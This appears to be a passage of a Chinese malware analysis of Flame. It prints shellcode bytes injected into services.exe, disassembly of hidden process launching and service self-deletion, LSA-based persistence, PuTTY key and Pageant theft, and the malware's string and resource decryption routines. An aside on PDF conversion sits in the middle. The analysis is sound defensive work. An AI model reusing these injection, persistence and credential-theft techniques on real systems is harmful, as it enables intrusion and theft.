0x01,0xFF,0x56,0x28,0x3B,0xC3,0x89,0x45,0xE4,0x75,0x0C,0xC7,0x45,0xF0,0x16,0x00,
0xFF,0xFF,0xE9,0x54,0x01,0x00,0x00,0x57,0x53,0x53,0x6A,0x02,0xFF,0x75,0xE4,0xFF,
0x56,0x30,0x3B,0xC3,0x89,0x45,0xEC,0x75,0x0C,0xC7,0x45,0xF0,0x17,0x00,0xFF,0xFF,
0xE9,0x36,0x01,0x00,0x00,0x80,0x7D,0x0B,0x00,0x0F,0x84,0x01,0x01,0x00,0x00,0x57,
0x53,0xFF,0x75,0xEC,0xFF,0x56,0x24,0x83,0xC4,0x0C,0x89,0x5D,0xD0,0x8D,0xBE,0xFA,
0x04,0x00,0x00,0x57,0xFF,0x56,0x14,0x3B,0xC3,0x89,0x45,0xB4,0x74,0x3B,0xFF,0x45,
0xD0,0x83,0x7D,0xD0,0x05,0x7C,0xEC,0x53,0x6A,0x18,0x8D,0x45,0x90,0x50,0x53,0x6A,
0xFF,0xFF,0x56,0x3C,0x3D,0x00,0x00,0x00,0xC0,0x72,0x2A,0x53,0x6A,0x18,0x8D,0x45,
0x90,0x50,0x53,0x6A,0xFF,0xFF,0x56,0x3C,0x83,0xF8,0xFF,0x77,0x18,0xC7,0x45,0xF0,
0x19,0x00,0xFF,0xFF,0xE9,0xD2,0x00,0x00,0x00,0xC7,0x45,0xF0,0x18,0x00,0xFF,0xFF,
0xE9,0xC6,0x00,0x00,0x00,0x8B,0x45,0x94,0x8B,0x40,0x0C,0x83,0xC0,0x0C,0x8B,0x38,
0xEB,0x0A,0x8B,0x4F,0x18,0x3B,0x4D,0xB4,0x74,0x08,0x8B,0x3F,0x3B,0xF8,0x75,0xF2,
0xEB,0x68,0x8B,0x47,0x1C,0x8B,0x4D,0xEC,0x89,0x41,0x04,0x8B,0x86,0x18,0x09,0x00,
0x00,0x6A,0x40,0x68,0x00,0x10,0x00,0x00,0x83,0xC0,0x14,0x50,0x53,0xFF,0x56,0x04,
0x3B,0xC3,0x75,0x09,0xC7,0x45,0xF0,0x1A,0x00,0xFF,0xFF,0xEB,0x7E,0x8B,0x4E,0x20,
0x89,0x48,0x10,0x8B,0x4E,0x38,0x89,0x48,0x0C,0x8B,0x4E,0x48,0x89,0x48,0x08,0x8B,
0x4D,0xEC,0xC7,0x00,0xBA,0xBA,0x0D,0xF0,0x89,0x48,0x04,0xFF,0xB6,0x18,0x09,0x00,
0x00,0x83,0xC0,0x14,0xFF,0xB6,0x14,0x09,0x00,0x00,0x89,0x45,0xB4,0x50,0xFF,0x56,
0x20,0x8B,0x45,0xB4,0x83,0xC4,0x0C,0x89,0x47,0x1C,0x8B,0x45,0xEC,0x39,0x58,0x04,
0x75,0x09,0xC7,0x45,0xF0,0x1B,0x00,0xFF,0xFF,0xEB,0x30,0x8B,0x4D,0xE8,0x89,0x08,
0x8B,0x4D,0xEC,0x33,0xC0,0x33,0xD2,0x83,0xC1,0x08,0x3B,0xC3,0x75,0x26,0x39,0x19,
0x75,0x02,0x8B,0xC1,0x42,0x81,0xC1,0x20,0x02,0x00,0x00,0x83,0xFA,0x28,0x72,0xEA,
0x3B,0xC3,0x75,0x10,0xC7,0x45,0xF0,0x1C,0x00,0xFF,0xFF,0x8B,0x7D,0xF4,0xC6,0x45,
0xFA,0x01,0xEB,0x5F,0x8B,0x4D,0xE0,0x8B,0x7D,0xF4,0x89,0x48,0x04,0x89,0x38,0xC7,
0x40,0x08,0x01,0x00,0x00,0x00,0x8B,0x8E,0x1C,0x09,0x00,0x00,0x89,0x48,0x0C,0x8A,
0x8E,0x20,0x09,0x00,0x00,0x88,0x48,0x10,0x8B,0x8E,0x10,0x09,0x00,0x00,0x89,0x88,
0x1C,0x02,0x00,0x00,0x68,0x0A,0x02,0x00,0x00,0x8D,0x8E,0x04,0x07,0x00,0x00,0x51,
0x83,0xC0,0x12,0x50,0xFF,0x56,0x20,0x83,0xC4,0x0C,0x80,0x7D,0x0B,0x00,0x74,0x13,
0xFF,0x75,0xE8,0x89,0x5D,0xEC,0x89,0x5D,0xE4,0xFF,0x56,0x38,0xC6,0x45,0xFB,0x00,
0x89,0x5D,0xE8,0x39,0x5D,0xEC,0x74,0x06,0xFF,0x75,0xEC,0xFF,0x56,0x34,0x39,0x5D,
0xE4,0x74,0x06,0xFF,0x75,0xE4,0xFF,0x56,0x4C,0x80,0x7D,0xFB,0x00,0x74,0x06,0xFF,
0x75,0xE8,0xFF,0x56,0x38,0x39,0x5D,0xE8,0x74,0x06,0xFF,0x75,0xE8,0xFF,0x56,0x4C,
0xFF,0x75,0xC0,0xFF,0x56,0x54,0x39,0x5D,0xDC,0x74,0x06,0xFF,0x75,0xDC,0xFF,0x56,
0x5C,0x80,0x7D,0xFA,0x00,0xB8,0x1E,0x00,0xFF,0xFF,0x74,0x2C,0x39,0x5D,0xBC,0x74,
0x0B,0x39,0x5D,0xE0,0x74,0x06,0x53,0x53,0x57,0xFF,0x55,0xE0,0x80,0xBE,0x20,0x09,
0x00,0x00,0x00,0x74,0x06,0x57,0xFF,0x56,0x34,0xEB,0x0A,0x68,0x00,0x80,0x00,0x00,
0x53,0x57,0xFF,0x56,0x08,0x8B,0x45,0xF0,0x89,0xBE,0x2C,0x0B,0x00,0x00,0xEB,0x05,
0xB8,0x05,0x00,0xFF,0xFF,0x5F,0x5E,0x5B,0xC9,0xC2,0x04,0x00,0x68
第三次接着上面的Shell Code地址顺序写入:
写入数据为,长度为4
0x00,0x00,0x00,0x00
第四次接着上面的Shell Code地址顺序写入:
Shell Code如下文件,长度为:0x5e2330
最后恶意代码通过函数CreateRemoteThread函数来创建远程线程,执行刚才写入到Services.exe进程中的Shell code。
发现对注册表进行操作:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SeCEdit
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:(ahyy)
键值: 类型: REG_BINARY 长度:16 (0x10) 字节 s
05 00 00 00 06 00 00 00 20 3E 44 29 E3 54 CD 01 | ........ >D)鉚?
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11
键值: 类型: REG_BINARY 长度:56 (0x38) 字节 s
000000: 36 00 31 00 00 00 00 00 C8 40 0A 0F 10 00 66 6C | 6.1.....菮....fl
000010: 61 6D 65 00 22 00 03 00 04 00 EF BE DC 40 EF 1C | ame.".....锞蹳?
000020: DC 40 18 1D 14 00 00 00 66 00 6C 00 61 00 6D 00 | 蹳......f.l.a.m.
000030: 65 00 00 00 14 00 00 00 | e.......
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\0
键值: 类型: REG_BINARY 长度:78 (0x4e) 字节 s
000000: 4C 00 31 00 00 00 00 00 C7 40 EA 39 10 00 6D 73 | L.1.....茾?..ms
000010: 73 65 63 6D 67 72 2E 6F 63 78 00 00 30 00 03 00 | secmgr.ocx..0...
000020: 04 00 EF BE DC 40 F5 1C DC 40 09 1D 14 00 00 00 | ..锞蹳?蹳......
000030: 6D 00 73 00 73 00 65 00 63 00 6D 00 67 00 72 00 | m.s.s.e.c.m.g.r.
000040: 2E 00 6F 00 63 00 78 00 00 00 1C 00 00 00 | ..o.c.x.......
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\0\
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\0\0
键值: 类型:REG_BINARY 长度:54 (0x36) 字节 s
000000: 34 00 35 00 00 00 00 00 DC 40 CB 1B 10 00 D8 53 | 4.5.....蹳?..豐
000010: CD 79 31 00 00 00 1E 00 03 00 04 00 EF BE DC 40 | 蛓1.........锞蹳
000020: F6 1C DC 40 08 1D 14 00 00 00 D8 53 CD 79 31 00 | ?蹳......豐蛓1.
000030: 00 00 16 00 00 00 | ......
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\0\0\
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\0\0\MRUListEx
键值: 类型: REG_BINARY 长度:4 (0x4) 字节 s
FF FF FF FF |
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\0\0\NodeSlot
键值: DWORD: 96 (0x60)
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\0\MRUListEx
键值: 类型: REG_BINARY 长度: 8 (0x8) 字节 s
00 00 00 00 FF FF FF FF | ....
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\0\NodeSlot
键值: DWORD: 95 (0x5f)
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\MRUListEx
键值: 类型: REG_BINARY 长度: 8 (0x8) 字节 s
00 00 00 00 FF FF FF FF | ....
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\NodeSlot
键值: DWORD: 94 (0x5e)
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\94\
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\94\Shell\
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\94\Shell\Address
键值: DWORD: 4294967295 (0xffffffff)
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\94\Shell\Buttons
键值: DWORD: 4294967295 (0xffffffff)
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\94\Shell\Col
键值: DWORD: 4294967295 (0xffffffff)
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\94\Shell\ColInfo
键值: 类型: REG_BINARY 长度: 112 (0x70) 字节 s
000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000010: FD DF DF FD 0F 00 04 00 20 00 10 00 28 00 3C 00 | 啐.... ...(.<.
000020: 00 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00 | ................
000030: B4 00 60 00 78 00 78 00 00 00 00 00 01 00 00 00 | ?`.x.x.........
...更多...
开机启动:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Authentication Packages
新: 类型: REG_MULTI_SZ 长度: 21 (0x15) 字节 s
6D 73 76 31 5F 30 00 6D 73 73 65 63 6D 67 72 2E | msv1_0.mssecmgr.
6F 63 78 00 00 | ocx..
旧: 类型: REG_MULTI_SZ 长度: 8 (0x8) 字节 s
6D 73 76 31 5F 30 00 00 | msv1_0..
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction\LcnEndLocation
新; 字符串: "10675834"
旧; 字符串: "0"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction\LcnStartLocation
新: 字符串: "10485101"
旧: 字符串: "0"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction\OptimizeComplete
新: 字符串: "Yes"
旧: 字符串: "No"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction\OptimizeError
新:字符串: " "
旧:字符串: "Missing Registry Entries"
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SeCEdit
HKLM\Software\Microsoft\Internet Explorer\LowRegistry
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option
HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation
HKLM\SOFTWARE\Symantec\Norton AntiVirus
HKLM\SOFTWARE\Symantec\InstalledApps
HKLM\SOFTWARE\KasperskyLab\avp6\settings
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKLM\SOFTWARE\KasperskyLab
HKLM\SOFTWARE\Symantec\SymSetup\Internet security
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
HKLM\SOFTWARE\Symantec\Symantec AntiVirus
HKLM\SYSTEM\CurrentControlSet\Control\Lsa
HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
HKIU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKLM\Software\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Capture\%s\properties
发现Flame遍历系统中所有顶层窗口,查找类名与窗口名都为”Pageant”的窗口并向其发送消息。经确认Pageant为Putty程序的认证代理工具,可以添加用户私钥,之后第一次登陆服务器时输入密码Pageant会将密码保存,以后则不需要输入密码。
SendMessageA( Msg=0x4a,wParam=0x00,lParam=0x804e50ba)
发现Flame恶意代码创建一个桌面,然后创建进程Iexplorer.exe并将其默认桌面设置为新创建的桌面,可能为达到隐藏启动的目的。
mov [ebp+StartupInfo.cb], 44h
mov eax, lpszDesktop
mov [ebp+StartupInfo.lpDesktop], eax ; set desktop
mov [ebp+CommandLine], bl
mov esi, 104h
push esi
push ebx
lea eax, [ebp+VersionInformation]
push eax ;
pVersionInformation
call 0x101A1130
add esp, 0Ch
push esi ; nSize
lea eax, [ebp+CommandLine]
push eax ;
"%ProgramFiles%\Internet Explorer\iexplore.exe"
push environment_strings
call ExpandEnvironmentStringsA
cmp eax, ebx
jz 0x100E3157
cmp eax, esi
ja 0x100E3157
lea eax, [ebp+ProcessInformation]
push eax ;
lpProcessInformation
lea eax, [ebp+StartupInfo]
push eax ;
lpStartupInfo
push ebx ;
lpCurrentDirectory
push ebx ;
lpEnvironment
push 4 ;
dwCreationFlags
push ebx ;
bInheritHandles
push ebx ; lpThreadAttributes
push ebx ;
lpProcessAttributes
lea eax, [ebp+CommandLine]
push eax ;
lpCommandLine
push ebx ;
lpApplicationName
call ds:CreateProcessA
分析中发现大量SQL语句,这些语句是操作SQLite数据库中的相关数据。
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
UPDATE %s SET Grade = (SELECT %d/%d.0*(rowid - 1) FROM st WHERE st.ProdID = %s.ProdID);
ELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
INSERT OR REPLACE INTO Configuration (Name, App, Value) VALUES('%s','%s' ,'%s');
INSERT OR IGNORE INTO %s (Name,App,Value) Values('STORAGE_LENGTH','%s',0);
UPDATE sqlite_master SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
UPDATE %s SET Value = Value - old.BufferSize WHERE Name = 'STORAGE_SIZE' AND App = '%s';
UPDATE %s SET Value = Value + 1 WHERE Name = 'STORAGE_LENGTH' AND App = '%s';
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
UPDATE %s SET Value = Value - 1 WHERE Name = 'STORAGE_LENGTH' AND App = '%s';
UPDATE %s SET Value = Value + new.BufferSize WHERE Name = 'STORAGE_SIZE' AND App = '%s';
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
INSERT OR IGNORE INTO %s (Name,App,Value) Values('STORAGE_SIZE','%s',0);
WQL的全称是WMI Query Language,简称为WQL, Windows管理规范查询语言。
root\ CIMV2
select * from Win32_LogicalDisk
SELECT * FROM __InstanceOperationEvent WITHIN %d WHERE TargetInstance ISA 'Win32_LogicalDisk'
select ProcessID, Name from Win32_Process
\\.\pipe\navssvcs
\\.\pipe\PipeGx16
\\.\\pipe\spoolss
分析过程中发现一些函数存在类似加花的指令,这些指令并不影响程序的任何功能,如下红色部分代码。
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov eax, eax
push ebx
push eax
pop eax
pop ebx
pusha
popa
mov esi, [ebp+8]
Flame在单独的线程修改权限,打开并创建服务,加载运行Rdcvlt32.exe程序。
push edi ;
lpPassword
push edi ;
lpServiceStartName
push edi ;
lpDependencies
push edi ;
lpdwTagId
push edi ;
lpLoadOrderGroup
push PathName ; lpBinaryPathName =
;"%windir%\system32\rdcvlt32.exe"
push edi ;
dwErrorControl
push 3 ;
dwStartType
push 10h ;
dwServiceType
push 0F01FFh ;
dwDesiredAccess
push DisplayName ; lpDisplayName
push ServiceName ; lpServiceName
push eax ; hSCManager
call CreateServiceA
cmp eax, edi
并且在创建完服务后直接将其启动,并删除服务,清理掉注册表相关痕迹。
mov eax, [ebx+4]
mov byte ptr [eax+6], 1
call start_service
mov [ebp-1], al
mov eax, edi
call delete_service
cmp al, 1
jnz 0x1011BCD9
各个模块字符串的加密部分析
各个模块的加密部分存在很大的相通相同处。采用的算法主要是通过如下方式:
图 3-5加密算法
各个文件采取的算法参数和算式如下:
File name
|
Param a
|
Param b
|
Param c
|
M
|
Mssecmgr.ocx
|
0xBh
|
0xBh+0xCh
|
[0x10376F70h]
|
M=(0xBh+n)*(0xBh+0xCh+n)+[0x101376F70h]
|
Msglu32.ocx
|
0xBh
|
0xBh+0xCh
|
[0x101863ECh]
|
M=(0xBh+n)*(0xBh+0xCh+n)+[0x101863ECh]
|
Advnetcfg.ocx
|
0x1Ah
|
0x5h
|
0
|
M==(0xAh+n)*(0x5h+n)
|
Nteps32.ocx
|
0x1Ah
|
0x5h
|
0
|
M==(0xAh+n)*(0x5h+n)
|
Soapr32.ocx
|
0x11h
|
0xBh
|
0
|
M==(0x11h+n)*(0xbh+n)
|
Noname.dll
|
0x11h
|
0xBh
|
0
|
M==(0x11h+n)*(0xbh+n)
|
Jimmy.dll
|
0xBh
|
0xBh+0x6h
|
0x58h
|
M=(0xbh+N)*(N+0xbh+0x6h)+0x58h
|
Comspol32.ocx
|
0xBh
|
0xBh+0x6h
|
0
|
M=(0xbh+N)*(N+0xbh+0x6h)
|
Browse32.ocx
|
0xBh
|
0xBh+0xch
|
0
|
M=(0xbh+N)*(N+0xbh+0xch)
|
发现Flame读取PUTTY创建Key的临时文件内容,可能为破解通讯密钥。
%Documents and Settings%\Administrator\PUTTY.RND
lea eax, putty_file_path[eax]
push eax ;
lpBuffer
push offset str_HOMEPATH ; decode:"HOMEPATH"
call my_decode_strA ; decode: "HOMEPATH"
pop ecx
push eax ;
lpName
call edi ; GetEnvironmentVariableA
test eax, eax
jnz short 0x10073E35
push esi ; uSize
push ebx ;
lpBuffer
call ds:GetWindowsDirectoryA
push ebx ; c1
call 0x101A1370
pop ecx
mov esi, eax
jmp short 0x10073E3B
add [ebp+var_4], eax
mov esi, [ebp+var_4]
push offset str_PUTTY_RND ; data
call my_decode_strA ; decode : "\PUTTY.RND"
push eax
lea eax, putty_file_path[esi]
push eax
call 0x101A1270 ; cat path
push ebx ;
hTemplateFile
push ebx ;
dwFlagsAndAttributes
push 3 ;
dwCreationDisposition
push ebx ;
lpSecurityAttributes
push 3 ;
dwShareMode
push 80000000h ; dwDesiredAccess
push offset putty_file_path ; lpFileName
call ds:CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+hObject], eax
jz short 0x10073EE6
push esi
mov esi, ds:ReadFile ;read putty.rnd file
图 3-6在内存中发现的一些LUA模块名
下面为Lua源文件:
const char *const luaP_opnames[NUM_OPCODES+1] = {
"MOVE",
"LOADK",
"LOADBOOL",
"LOADNIL",
"GETUPVAL",
"GETGLOBAL",
"GETTABLE",
"SETGLOBAL",
"SETUPVAL",
"SETTABLE",
"NEWTABLE",
"SELF",
"ADD",
"SUB",
"MUL",
"DIV",
"MOD",
"POW",
"UNM",
"NOT",
"LEN",
"CONCAT",
"JMP",
"EQ",
"LT",
"LE",
"TEST",
"TESTSET",
"CALL",
"TAILCALL",
"RETURN",
"FORLOOP",
"FORPREP",
"TFORLOOP",
"SETLIST",
"CLOSE",
"CLOSURE",
"VARARG",
NULL
};
发现内容完全一致,在分析过程中又发现大量Lua代码因此得出恶意代码是静态的将Lua代码编译进程序中的。
发现Flame内部包含的Lua代码的版本为Lua 5.1
mov eax,edi
call mssecmgr.100B8F0F
push mssecmgr.1026195C ; ASCII "_G"
mov eax,edi
call mssecmgr.100B9417
pop ecx
mov eax,mssecmgr.10261778
mov ebx,mssecmgr.10261960 ; ASCII "_G"
mov ecx,esi
call mssecmgr.100B9DB3
push 0x7
push mssecmgr.10261964 ; ASCII "Lua 5.1"
mov eax,esi
call mssecmgr.100B9142
push mssecmgr.1026196C ; ASCII "_VERSION"
mov eax,edi
call mssecmgr.100B9417
add esp,0xC
push mssecmgr.100CF1E6
push mssecmgr.100CF23B
push mssecmgr.10261978 ; ASCII "ipairs"
mov eax,esi
call mssecmgr.100CFAE7
add esp,0xC
push mssecmgr.100CF171
push mssecmgr.100CF1B0
push mssecmgr.10261980 ; ASCII "pairs"
mov eax,esi
call mssecmgr.100CFAE7
add esp,0xC
push 0x1
push 0x0
mov eax,esi
call mssecmgr.100B932F
or eax,-0x1
call mssecmgr.100B8F0F
push -0x2
pop eax
call mssecmgr.100B953A
push 0x2
push mssecmgr.10261988 ; ASCII "kv"
图 3-7 Flame代码
static void base_open (lua_State *L) {
/* set global _G */
lua_pushvalue(L, LUA_GLOBALSINDEX);
lua_setglobal(L, "_G");
/* open lib into
global table */
luaL_register(L, "_G", base_funcs);
lua_pushliteral(L, LUA_VERSION); //LUA_VERSION : "Lua 5.1"
lua_setglobal(L, "_VERSION"); /* set global
_VERSION */
/* `ipairs' and
`pairs' need auxliliary functions as upvalues */
auxopen(L, "ipairs", luaB_ipairs, ipairsaux);
auxopen(L, "pairs", luaB_pairs, luaB_next);
/* `newproxy' needs
a weaktable as upvalue */
lua_createtable(L, 0, 1); /* new table `w' */
lua_pushvalue(L, -1); /* `w' will be its
own metatable */
lua_setmetatable(L, -2);
lua_pushliteral(L, "kv");
lua_setfield(L, -2, "__mode"); /*
metatable(w).__mode = "kv" */
lua_pushcclosure(L, luaB_newproxy, 1);
lua_setglobal(L, "newproxy"); /* set global
`newproxy' */
图 3-8 Lua代码
Flame中包含的结构与Lua5.1一致。
图 3-9Flame中的LUA结构
static const luaL_Reg base_funcs[] = {
{"assert", luaB_assert},
{"collectgarbage", luaB_collectgarbage},
{"dofile", luaB_dofile},
{"error", luaB_error},
{"gcinfo", luaB_gcinfo},
{"getfenv", luaB_getfenv},
{"getmetatable", luaB_getmetatable},
{"loadfile", luaB_loadfile},
{"load", luaB_load},
{"loadstring", luaB_loadstring},
{"next", luaB_next},
{"pcall", luaB_pcall},
{"print", luaB_print},
{"rawequal", luaB_rawequal},
{"rawget", luaB_rawget},
{"rawset", luaB_rawset},
{"select", luaB_select},
{"setfenv", luaB_setfenv},
{"setmetatable", luaB_setmetatable},
{"tonumber", luaB_tonumber},
{"tostring", luaB_tostring},
{"type", luaB_type},
{"unpack", luaB_unpack},
{"xpcall", luaB_xpcall},
{NULL, NULL}
};
图 3-10Lua 5.1 中的结构
而Lua5.1版本发布的时间为2006年2月21日,Lua 5.2版本发布日期为2011年12月16日。这也间接证明了Flame的开发时间应为2006年2月21日至2011年12月16日之间。
同时在分析过程中发现了大量的Lua脚本函数名见附录七(详见附录七为Mssecmgr.ocx文件中使用Lua脚本函数列表内容)可以通过这些函数名来辅助判断Lua脚本功能。
在主程序地址10266CE处发现可以被RawDES 算法使用的数组RawDES_Spbox。
通过对调用该地址的函数进行分析,确认该程序确实使用了des加密算法。
说明如下:
通过对调用该地址的函数进行分析。发现调用函数中有16处循环计算表达式。是DES加密算法的明显特征。计算出每个数值后,后面的异或操作也和DES算法的计算方式匹配。
对函数的调用,其参数的第三个为加密的密钥。
int 0x10084393 (int a1, unsigned int a2, int a3, int a4)
主模块加载资源到内存,进行简单异或解密,算法代码如下:
首先传入DB DF AC A2 作为文件头,然后对资源逐字节解密。
判断当前字节是否是0XA9:
如果是,则直接与前一解密后的数据异或,结果为解密后的数据。
如果不是,则将EDX赋值为0XA9后,并与EDX异或,得出结果在与前一解密后的数据异或。最后得出的结果为解密后的数据。
10050898 mov al,byte ptr ds:[esi]
1005089A test al,al
1005089C je short 0x100508A9
1005089E cmp al,0xA9
100508A0 je short 0x100508A9
100508A2 mov edx,0xA9
100508A7 jmp short 0x100508AB
100508A9 xor edx,edx
100508AB xor al,dl
100508AD xor cl,al
100508AF mov byte ptr ds:[edi+esi],cl
100508B2 inc esi
100508B3 dec dword ptr ss:[esp+0xC]
100508B7 jnz short 0x10050898
经过对Flame调用Lua函数的分析总结发现Flame调用Lua脚本的方式。首先程序在初始化过程中在Lua环境内创建一些表,然后在这些表中保存Key,Value形式的键值对,后续通过获取指定的表,然后将表中指定的Key的值取出来,作为Lua代码执行。如以下代码所示,Flame的表名,及Key的名字时全部都是加密存储,使用时在将其解密。
mov eax,esi
call mssecmgr.100B932F ; lua_createtable
mov esi,dword ptr ds:[edi+0xD4]
push mssecmgr.10304B78
call mssecmgr.1000E431 ; decode string "script"
add esp,0xC
push eax
call mssecmgr.100B917A ; lua_pushstring
mov eax,dword ptr ds:[edi+0xBC]
mov edx,dword ptr ds:[edi+0xD4]
pop ecx
push eax
lea ecx,dword ptr ds:[edi+0xB0]
call mssecmgr.1000757C
push eax
mov eax,edx
call mssecmgr.100B9142 ; lua_pushlstring
mov esi,dword ptr ds:[edi+0xD4]
pop ecx
pop ecx
push -0x3
pop eax
call mssecmgr.100B93F4 ; lua_settable : set value
lea ecx,dword ptr ds:[edi+0x8C]
mov eax,dword ptr ds:[ecx]
图 3-11设置script的值
mov esi,dword ptr ds:[ebx+0xD4]
push mssecmgr.10304BB0
call mssecmgr.1000E431 ; decode string "_params"
pop ecx
push eax
mov eax,-0x2712
call mssecmgr.100B9285 ; table name is "_params"
mov esi,dword ptr ds:[ebx+0xD4]
mov dword ptr ss:[esp],mssecmgr.10304BCC
call mssecmgr.1000E431 ; decode string "script"
pop ecx
push eax
call mssecmgr.100B917A ; lua_pushstring
mov esi,dword ptr ds:[ebx+0xD4]
pop ecx
push -0x2
pop eax
call mssecmgr.100B9269 ; lua_gettable get lua script
mov esi,dword ptr ds:[ebx+0xD4]
push -0x2
pop eax
call mssecmgr.100B8DFE ; lua_remove
mov eax,dword ptr ds:[ebx+0xD4]
and dword ptr ss:[esp+0x10],0x0
lea ecx,dword ptr ss:[esp+0x10]
push ecx
push -0x1
push eax
call mssecmgr.100B9C8B ; luaL_checklstring
mov esi,dword ptr ds:[ebx+0xD4]
add esp,0xC
push mssecmgr.10304BE8
mov edi,eax
call mssecmgr.1000E431 ; decode string "script"
pop ecx
push eax
push dword ptr ss:[esp+0x14]
mov eax,edi
call mssecmgr.100BA0B2 ; luaL_loadbuffer load lua script
test eax,eax
pop ecx
pop ecx
jnz mssecmgr.100B8381
mov ecx,dword ptr ds:[ebx+0xD4]
xor edi,edi
push eax
inc edi
call mssecmgr.100B966F ; lua_pcall call lua script
图 3-12读取并执行script的值
分析发现加密字符串中存在有关虚拟打印机相关字符串, 和大量用作PDF转换的相关软件的名字,推测为判断本机是否安装此类软件,可能会利用这些软件进行转换操作。
add esp, 0Ch
push offset unk_102CA098
call near ptr my_decode_strW ; decode : "Microsoft Office
Document Image Writer"
; Microsoft Office Document Imaging Writer 独立安装版
有些人希望把pdf格式的文件转化成word或者jpeg,因此去寻找专用的软件,其实这些软件用起来并不好用,我们可以用office自带的虚拟打印机完成快速转化。
1、pdf-word:用Adobe Reader 打开文件,选择打印文件,打印机选为Microsoft Office Document Imaging Writer,打印。会生成一系列*.mdi文件,
用Microsoft Office Document Imaging (office工具)打开,用“工具”下的“将文件发送到word”完成转换(相比尚书等软件正确率很高!)。
2、pdf-jpeg:按上面的步骤把pdf转成mdi,再用Microsoft Office Document Imaging将mdi转存为*.tag图像文件。一般的绘图软件都可识别tag,
再用这些软件将tag转存成jpeg(这种方法适用通篇文章的转化,局部copy大家都会,不用罗索了)。
add esp, 4
mov [ebp+var_A0], eax
push offset unk_102CA148
call near ptr my_decode_strW ;
decode : "Microsoft XPS Document Writer"
;也是一款windows虚拟打印机
add esp, 4
mov [ebp+var_9C], eax
push offset unk_102CA1B0
call near ptr my_decode_strW ; decode : "Send to Onenote 2007"
; Office OneNote 2007